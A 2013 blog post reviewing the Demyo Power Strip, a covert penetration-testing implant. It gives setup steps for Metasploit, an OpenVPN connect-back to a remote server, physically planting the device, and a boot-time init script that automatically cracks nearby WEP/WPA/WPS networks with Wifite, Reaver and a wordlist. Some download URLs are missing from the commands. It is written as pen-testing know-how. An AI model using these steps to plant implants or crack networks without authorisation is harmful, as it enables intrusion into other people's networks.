Thursday, February 7, 2013

Sneaking into networks with the Demyo Power Strip


Let's see if this silicon blade is sharp enough to cut through the security cheese! 

Some intros: The Demyo Power Strip (DPS) is a covert penetration testing device built by Demyo Sec made to be used for penetration tests. While not being the first of its kind out there, is a strong competitor to other existing tools, such as Power Pwn, and the PlugBot etc. The DPS gives you the ability to launch attacks over ethernet, WiFi and Bluetooth.


  • Based on Raspberry Pi
  • CPU 700Mhz, boostable to 1Ghz, 512MB RAM, 32GB SD
  • Ethernet (10/100), WiFi b/g/n and Bluetooth connectivity
  • Runs Debian Linux
  • CLI (via SSH) and GUI (via VNC)
  • Physical dimensions 14″ x 2.25″ x 8.25″ or 35.56cm x 5.72cm x 20.96cm 
  • Actually functions as a real power strip

Default Installed Tools

Some of the relevant packages installed:
  • Nmap
  • OpenVPN
  • w3af
  • aircrack-ng
  • btscanner
  • ophcrack
  • John the Ripper password cracker
  • and many more...

Getting Ready

Connecting for the First Time

To setup the DPS, we'll need to hook it up to our network using an ethernet cable. The DPS will pickup an IP address via DHCP and start to listen for SSH connections.

Installing Your Preferred Tools

Installing your preferred toolset can be easy as 1-2-3 thanks to the Debian flavor of Linux running on the DPS. Just run apt-get install for your favorite tool.

Installing the Metasploit Framework

To setup Metasploit you should run the following commands:

  1. wget
  2. tar -xvvf framework-latest.tar.bz2
  3. apt-get update
  4. apt-get dist-upgrade (can take a bit)
  5. apt-get install postgresql-9.1 postgresql-client-9.1 postgresql-contrib-9.1 postgresql-doc-9.1 postgresql-server-dev-9.1
  6. gem install pg

Setting up a OpenVPN Server

For the DPS to connect back, I chose the OpenVPN route. You can easily setup a OpenVPN server on Amazon EC2 as described here (I used Ubuntu as a server).

The server setup:

port 1194
proto tcp-server
dev tun1
status server-tcp.log
verb 3
secret  ovpn.key

Setting up OpenVPN on the DPS 

Now that we have a server to connect back to, let's setup the DPS to auto connect to this server.

The DPS OpenVPN client configuration:

dev tun
proto tcp-client
port 1194
redirect-gateway def1
keepalive 10 60
secret ovpn.key
verb 3
mute 10

To setup auto connect on boot simply run "service openvpn start" after adding the key and configuration files.

Sneaking In

Now all you need to do is walk into the location of interest, plugin the DPS and wait for it to connect back to your OpenVPN server. For the DPS to connect back you, will either need to connect a network cable or let it find an available WiFi access point (AP). If there are no open WiFi APs, we can setup the DPS to brute force the PSK via aircrack-ng. You'll have to take a lengthy break for this scenario cause it may be a while for the cracking to succeed.

w00t w00t! Seeing the DPS Connect

You can run netstat to find an established connection or look at /var/log/syslog to track the OpenVPN logs. Due to our simple OpenVPN setup, the DPS will be at Now we can SSH into it and go to town!

Automating WEP/WPA/WPS cracking with Wifite and Reaver

Installing the tools:

  1. wget -O && chmod +x
  2. wget && gunzip darkc0de.lst.gz
  3. sudo apt-get install sqlite3 libsqlite3-dev gcc-4.7
  4. svn checkout reaver-wps-read-only
  5. cd reaver-wps-read-only && ./configure && make && make install
Wifite comes with Reaver/WPS integration so all you have to do is run Wifite as:
  • ./ -all
This will make Wifite perform all three types of attacks (WEP/WPA/WPS).

You can also configure Wifite to start on boot as a service by doing the following:
  1. nano /etc/init.d/wcracker
  2. Add the following code:
    # Provides:          Wcracker Service
    # Required-Start:    $local_fs  $network $remote_fs $syslog
    # Required-Stop:     $local_fs  $network $remote_fs $syslog
    # Default-Start:
    # Default-Stop:
    # X-Interactive:     true
    # Short-Description: Start/stop Wcracker Service
    export USER='root'
    eval cd ~$USER
    case "$1" in
        # Start the wifi cracker
        su $USER -c '/root/ -all -dict /root/darkc0de.lst'
        echo "Starting wireless cracking for $USER "
        # if it's stop, then just kill the process
        echo "wireless cracking stopped"
        echo "Usage: /etc/init.d/wcracker {start|stop}"
        exit 1
    exit 0
  4. update-rc.d wcracker defaults
  5. And reboot
Wifite saves the cracked passwords in the file cracked.txt. You can further automate the process by building a script that checks the cracked.txt file and logs into the cracked network for a connect back, but this is a bit out of scope at the moment (maybe on a separate post).

Some Snooping Around with Metasploit

Create a database (e.g. msf)  in your Postgres installation then launch Metasploit to connect and populate the database and module cache.
cd msf3
msf > db_connect postgres:password@localhost/msf

You can scan the environment for potential targets using modules, such as  auxiliary/scanner/smb/smb_version or build a database of targets with nmap and launch attacks.

msf > db_nmap -v -sV

The command above builds a database of the scanned network that can be used later on.

To get more in depth information about how to use Metasploit you can visit the Offensive Security web site


Overall, the DPS appears to be a decent covert platform to perform penetration testing. It doesn't physically appear suspicious as other similar devices, especially with an ethernet cable sticking out. The OS is flexible enough to rapidly install or compile non-default tools. It would be great if it had a 3G modem and I heard from Demyo Sec that it will be present in the next release.

Can you build this device yourself and spend countless hours soldering and testing? Maybe... OR you can dish out $750 and be on your way to pen tester stardom!

You can get more information from Demyo Sec's web site.


The material and actions described here are for educational purposes only. 

No comments:

Post a Comment